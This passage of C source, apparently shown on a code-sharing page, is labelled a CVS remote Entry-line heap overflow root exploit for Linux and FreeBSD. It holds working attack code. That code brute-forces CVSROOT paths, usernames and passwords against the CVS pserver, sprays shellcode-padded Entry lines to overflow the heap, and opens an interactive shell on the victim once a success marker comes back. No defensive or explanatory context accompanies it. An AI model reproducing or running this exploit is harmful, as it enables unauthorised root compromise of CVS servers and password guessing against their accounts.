📄 cvs remote entry line heap overflow root exploit (linuxfreebsd).txt
字号:
for (i = 0; i < PCNT + 1; i++)
printf("\b");
memset(sc, 'A', SCSIZE);
memcpy(sc + SCSIZE - sizeof(xx_shellcode), xx_shellcode,
sizeof(xx_shellcode));
sc[SCSIZE] = 0;
last = o = 0;
for (i = 0; i < scnum; i++)
{
now = time(NULL);
if (now > last || (i + 1 == scnum))
{
last = now;
for (j = 0; j < o; j++)
printf("\b");
for (j = 0; j < (o = ((i+1) * PCNT / scnum)); j++)
printf("#");
}
zprintf(CVSENTRY"%s\n", sc);
}
printf("] ");
zflush(0);
zflush(1);
len = read_sock(sc, sizeof(sc));
for (i = 0; i < len; i++)
if (!memcmp(sc + i, ABMAGIC, ABMAGICSZ))
{
printf(EXPLOITROX);
sh(sock);
}
printf(BAD_TRIP);
}
int brute_cvsroot(void)
{
int i, ret = 0;
char * rbuf;
info("Bruteforcing cvsroot...\n");
for (i = 0; CVSROOTS[i].name; i++)
{
nopen(host, port);
nprintf(CVS_VERIF, CVSROOTS[i].name, DUMMY, scramble(DUMMY));
info("Trying CVSROOT = %s\t", CVSROOTS[i].name);
rbuf = flush_sock();
nclose();
if (!rbuf || strstr(rbuf, CVS_BAD_REP))
info(BAD_TRIP);
else if (strstr(rbuf, CVS_AUTH_FAILED) ||
strstr(rbuf, CVS_AUTH_SUCCESS) ||
strstr(rbuf, CVS_NO_USER))
{
info(GOOD_TRIP);
CVSROOTS[i].id = i;
root = CVSROOTS[i].name;
if (user && pass)
{
free(rbuf);
return (1);
}
ret++;
}
else
printf(BAD_TRIP);
free(rbuf);
}
return (ret);
}
int brute_username(void)
{
int i, c, ret = 0;
char * rbuf;
info("Bruteforcing cvs login... \n");
for (c = 0; CVSROOTS[c].name; c++)
{
if (!root && CVSROOTS[c].id == -1) continue;
for ( i=0; USERNAMES[i].name; i++ )
{
if (root)
CVSROOTS[c].name = root;
info("Trying cvsroot = %s, login = %s\t", CVSROOTS[c].name,
USERNAMES[i].name);
nopen(host, port);
nprintf(CVS_VERIF, CVSROOTS[c].name, USERNAMES[i].name,
scramble(DUMMY));
rbuf = flush_sock();
nclose();
if ( strstr( rbuf, CVS_NO_USER))
info( BAD_TRIP, rbuf );
else if (strstr( rbuf, CVS_AUTH_FAILED) ||
strstr(rbuf, CVS_AUTH_SUCCESS))
{
info(GOOD_TRIP);
USERNAMES[i].id = CVSROOTS[c].id;
user = USERNAMES[i].name;
if (pass)
{
free(rbuf);
return (1);
}
ret++;
}
free(rbuf);
}
if (root)
return (ret);
}
return (ret);
}
int brute_password(void)
{
int i, c, ret=0;
char * rbuf;
info("Bruteforcing cvs password...\n");
for (c = 0; USERNAMES[c].name; c++)
{
if (!user && USERNAMES[c].id == -1) continue;
for (i = 0; PASSWORDS[i].name; i++)
{
info("Trying login = %s, pass = %s\t", user?user:USERNAMES[c].name,
PASSWORDS[i].name);
nopen(host, port);
nprintf(CVS_VERIF,root?root:CVSROOTS[USERNAMES[c].id].name,
user?user:USERNAMES[c].name, scramble(PASSWORDS[i].name) );
rbuf = flush_sock();
nclose();
if (strstr(rbuf, CVS_AUTH_FAILED))
info(BAD_TRIP, rbuf);
else if (strstr(rbuf, CVS_AUTH_SUCCESS))
{
info(GOOD_TRIP);
if (!root)
root = CVSROOTS[ USERNAMES[c].id ].name;
if (!user)
user = USERNAMES[c].name;
pass = PASSWORDS[i].name;
free(rbuf);
printf(SUCCESS_LOGON, user, pass, root);
return (1);
}
else
info(BAD_TRIP);
free(rbuf);
}
if (user)
return (0);
}
return (0);
}
void hdl_crashed(int signum)
{
return;
}
int write_sock(void * buf, int sz)
{
fd_set wfds;
struct timeval tv;
int ret;
if (sz <= 0)
return (sz);
FD_ZERO(&wfds);
FD_SET(sock, &wfds);
bzero(&tv, sizeof (tv));
tv.tv_sec = timeout;
tv.tv_usec = 0;
while (select(sock + 1, NULL, &wfds, NULL, &tv) <= 0)
{
FD_ZERO(&wfds);
FD_SET(sock, &wfds);
tv.tv_sec = timeout;
tv.tv_usec = 0;
}
if ((ret = write(sock, buf, sz)) != sz)
QUIT(ERR_WRITESOCK);
return (ret);
}
int read_sock(void * buf, int sz)
{
fd_set rd;
struct timeval tv;
int ret;
FD_ZERO(&rd);
FD_SET(sock, &rd);
bzero(&tv, sizeof (tv));
tv.tv_sec = timeout;
tv.tv_usec = ret = 0;
if (select(sock + 1, &rd, NULL, NULL, &tv) <= 0)
QUIT(ERR_READSOCK);
if ((ret = read(sock, buf, sz)) <= 0)
return (ret);
}
char * flush_sock(void)
{
char * ret;
int len, y, i = 0;
fd_set rfds;
struct timeval tv;
FD_ZERO(&rfds);
FD_SET(sock, &rfds);
bzero(&tv, sizeof (tv));
tv.tv_sec = timeout;
tv.tv_usec = 0;
#define BUF_SIZE 42
ret = malloc((len = BUF_SIZE));
if (select(sock + 1, &rfds, NULL, NULL, &tv) < 0)
return ("");
while ((y = read(sock, ret + i, BUF_SIZE)) > 0)
{
i += y;
ret = realloc(ret, (len += BUF_SIZE));
}
if (i == len)
realloc(ret, len + 1);
ret[i] = 0;
return (ret);
}
long getip(char * hostname)
{
struct hostent * p_hostent;
long ipaddr;
ipaddr = inet_addr( hostname );
if (ipaddr < 0)
{
p_hostent = gethostbyname(hostname);
if (p_hostent == NULL)
QUIT(ERR_GETIP);
memcpy( &ipaddr, p_hostent->h_addr, p_hostent->h_length );
}
return(ipaddr);
}
int connect_to_host(char * host, int port)
{
struct sockaddr_in s_in;
memset( &s_in, '\0', sizeof(struct sockaddr_in) );
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = getip( host );
s_in.sin_port = htons( port );
if ((sock = socket( AF_INET, SOCK_STREAM, 0 )) <= 0)
QUIT(ERR_CONN);
if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)))
QUIT (ERR_CONN);
#ifdef SHITTEST
sleep(15);
#endif
fcntl(sock, F_SETFL, O_NONBLOCK);
return (sock);
}
void nopen(char * host, int port)
{
connect_to_host(host, port);
cur_num = 0;
return;
}
void nclose(void)
{
cur_num = 0;
close(sock);
return;
}
unsigned char shifts[] = {
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87,
111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105,
41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35,
125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56,
36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48,
58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223,
225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190,
199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193,
174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212,
207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246,
192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176,
227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127,
182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195,
243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 };
char * scramble(char * str)
{
int i;
char * s;
if (is_scramble)
return (str);
s = (char *) malloc (strlen (str) + 3);
memset(s, '\0', strlen(str) + 3);
*s = 'A';
for (i = 1; str[i - 1]; i++)
s[i] = shifts[(unsigned char)(str[i - 1])];
return (s);
}
int sh(int sockfd)
{
int cnt;
char buf[1024];
fd_set fds;
write(sockfd, CMD, strlen(CMD));
while(1)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sockfd, &fds);
if(select(FD_SETSIZE, &fds, NULL, NULL, NULL))
{
if(FD_ISSET(0, &fds))
{
if((cnt = read(0, buf, 1024)) < 1)
{
if(errno == EWOULDBLOCK || errno == EAGAIN)
continue;
else
break;
}
write(sockfd, buf, cnt);
}
if(FD_ISSET(sockfd, &fds))
{
if((cnt = read(sockfd, buf, 1024)) < 1)
{
if(errno == EWOULDBLOCK || errno == EAGAIN)
continue;
else
break;
}
write(1, buf, cnt);
}
}
}
exit(0);
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -